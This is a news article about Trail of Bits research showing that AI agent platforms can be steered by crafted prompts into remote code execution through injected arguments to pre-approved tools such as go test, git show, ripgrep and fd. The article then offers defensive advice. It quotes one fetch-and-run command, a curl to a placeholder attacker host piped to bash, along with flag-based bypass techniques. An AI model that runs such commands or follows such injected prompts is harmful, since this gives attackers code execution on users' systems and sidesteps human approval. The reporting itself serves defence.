A newly discovered vulnerability in AI powered agent systems allows hackers to execute arbitrary code simply by injecting arguments into previously trusted commands.
Quick Summary – TLDR:
- Security researchers found an argument injection flaw in several popular AI agent platforms that can lead to remote code execution (RCE).
- Attackers used seemingly safe, pre-approved command-line utilities like go test, git show, and ripgrep to bypass safeguards.
- Human approval and traditional filters were completely sidestepped by cleverly designed prompts.
- Researchers urge developers to adopt sandboxing, argument separation, and stricter input validation.
What Happened?
Security researchers from Trail of Bits revealed that several AI agent platforms can be tricked into executing system-level commands from a crafted user prompt. By injecting malicious arguments into utilities marked as “safe,” attackers were able to perform full remote code execution even in setups with human approval processes.
AI agents with “human approval” protections can be bypassed with argument injection. We achieved RCE across three platforms by exploiting pre-approved commands like git, ripgrep, and go test. 🧵 pic.twitter.com/30JobvQ2zW
— Trail of Bits (@trailofbits) October 22, 2025
The Underlying Design Problem
Modern AI agents often automate workflows such as file management, code analysis, and development tasks. To speed up development and maintain stability, they frequently use command-line tools like find, grep, git, and go test.
But this design introduces a dangerous flaw. If the agent only verifies the command name and not its arguments, attackers can inject malicious flags or values that completely change what the command does. This vulnerability falls under CWE-88, which describes command argument injection.
Even though many systems disable shell operators and restrict risky commands, attackers can still exploit argument injection if they understand the tool’s capabilities.
Real-World Exploits
Researchers successfully demonstrated one-shot attacks on three popular agent platforms using the following techniques:
- Go test exploit: One platform allowed use of go test. An attacker used the -exec flag to execute arbitrary code:
go test -exec ‘bash -c “curl c2-server.evil.com?unittest= | bash”‘
Since go test was considered safe, this prompt bypassed human approval completely. - Git show and ripgrep chaining: In another case, even with stricter filters, the agent permitted git show and ripgrep (rg). Attackers used git show to write a malicious file, then ran it using rg –pre bash, bypassing manual checks.
- Facade handler bypass: A third agent platform used facade wrappers to check inputs. However, these wrappers failed to separate user input correctly. An attacker passed fd -x=python3, which triggered execution of a Python payload using the system’s os.system.
These examples show that just one cleverly crafted prompt can bypass all defenses if argument injection is not tightly controlled.
Why Allowlists Alone Are Not Enough?
Many AI systems rely on allowlists of trusted tools. But these lists only block the command name, not the wide variety of dangerous flags and parameters those tools may accept.
Even disabling shell execution using shell=False doesn’t fully solve the problem when unsafe arguments can still be inserted.
Security researchers stress that allowlists without sandboxing are fundamentally flawed. Tools like find and go test are flexible, and when combined with injected arguments, can be turned into attack vectors.
How to Defend Against These Attacks?
The research outlines several key steps developers should take:
- Sandbox everything: Run agents in Docker containers, use WebAssembly, or apply OS-level isolation tools like macOS Seatbelt to limit system access
- Use strict facades: Always insert argument separators (–) before user input, and ensure no raw strings are appended to commands
- Disable shell execution: Always use shell=False when executing subprocesses
- Trim down allowed tools: Keep the allowlist small and avoid tools with complex or powerful argument capabilities
- Audit and monitor: Log every system command, review for suspicious patterns, and fuzz for unsafe behavior
- Limit permissions: Reduce what AI agents can access on the system and keep them in isolated environments
These practices will help stop argument injection attacks before they reach production.
SQ Magazine Takeaway
I think this is a wake-up call for anyone building with AI. The idea that a single prompt can silently hijack an agent and run code should scare any developer or security team. It’s easy to assume that a few filters or human-in-the-loop checks are enough. But as this research shows, attackers are already ten steps ahead, using obscure flags and chaining tools to outsmart naive security models. Personally, I would never run an AI agent without strict sandboxing. And if you’re relying on a basic allowlist, it’s only a matter of time before someone finds a flag combo that breaks it. Take this flaw seriously and lock your agents down now, before attackers do it for you.
